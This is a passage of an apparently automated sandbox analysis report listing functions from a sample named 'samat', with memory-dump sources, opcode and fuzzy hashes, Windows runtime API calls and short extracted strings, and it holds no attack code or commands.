                                                                                                                                                                                                                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                                                      • Instruction ID: f0cc6981874ae1e4e83bbbda7f8231ba2ce14cdd7852a331e847ba866ec1225f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97217F72B1878182E721AB51B8827EAA298BB88384F804137FE8D93659DFBCD155C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                                                      • Instruction ID: c812952b3c9c5f1efef9bf35d97d970c124134a5925a48ec373d531ee2ef18c3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9F0682270970681EF15AB24EC563759328FF49761F944237D57E451E4DFBDD044C322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                      • Instruction ID: 7da888a16346858616c46f2e1825281b0af9907d375dea920da0568e8fa27529
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2118922F5CA0301FF563256ECA33799258AF55360E84D637FA6FD63D68EFC58414122
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3AF
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3CE
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3F6
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB407
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB418
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                                                                                                                                                                                                      • Instruction ID: d42ab028b4c6c82e7e75043ef3cc9cafb51a2374711b1084feed7626b62e337f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D116022F0864241FB54B726ED633B99149AF457B0FC84336D82E467CADDBDE4528226
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                                                                                                                                                                                                      • Instruction ID: f3fc36c4f2c9f8cf0da75019a1960821875c7ac530a93af9de9d1ee1cf7523cb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1113622F0820342FB687262CC277BE914A5F46335F84473AD93E0A2C6DDBDB8114237
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                                      • Instruction ID: 0449f084a999739a1ea63e0c6ec76723555590a9e7e7d8026b7d5408e26b1d21
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B91D233B0864681F760AE24DC5277DB7A9AB44B94FC44133DA6D473D5DEBDE4058322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                                                      • Instruction ID: 1bde7abaf74e265acf9910cc2706a8260ceb2c6d66cd1714166ae8b7dbc88686
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B819673F0824285E764BF25C9023B8B6A89B15B4CFD54037CA1997295CBBDE503932F
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                                                      • Instruction ID: a41aad11e155a191a89aba095d5a602d812d26114f03c9bc50745866e9447eee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9051D032B196468BDB18EB15E805B39B399EB44B88F908132DB4E57744DFBCE841C791
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                                                      • Instruction ID: 7dca480201d23c5cc3b86cc1976281541331fd4fa52ef37d07f15c7c6497111e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E519072B0868286EB74AB21D8463A8F7A8FB55B84F944137DB4C43B85CFBCE450C716
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                                                      • Instruction ID: 4f4acf3db6a1496d3ccb50d3957312152144630ee5cc2409c2be93bbd7d7be7a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4461A532A08BC586D730AB15E8413EAF7A4FB85B84F444226EB9C13B59DFBCD190CB11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                                                      • Instruction ID: c20c5bac15e93646483ef002f2ef816c3de1d88c6d6b17bdf81f9a4ea31eda03
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0921AE62B08B4182E711AB24F8467EAA3A8FB88780F804137EE8D93759DF7CD255C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                                                      • Instruction ID: ca859f0debb260d3f94ba8c9b9133667254b6a4473089241e7fd301a5f4fd0f6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D12273B08A818AE711DF65C8412FCB7B9FB54798B80423ACE4E97B89DE78D016C311
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                                      • Instruction ID: bdb3119776480670bd33c00a24fb90074b6b5d7000cde9b4a31b5e9c0cd29130
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A111E925B0C14282FB55A76AED463799296FFC4780FC48033DB4907B8ACDFDD581C212
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                      • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 64fa262109a55f46b90cb0bb29926850b713b0a42e297736b0476290db06b84c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09419E56B2834142FB62A731DC13379E758EB80BA4F948236EE4D87AD9DFBCD0418B01
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D9046
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7E12CCBA5), ref: 00007FF7E12D9064
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
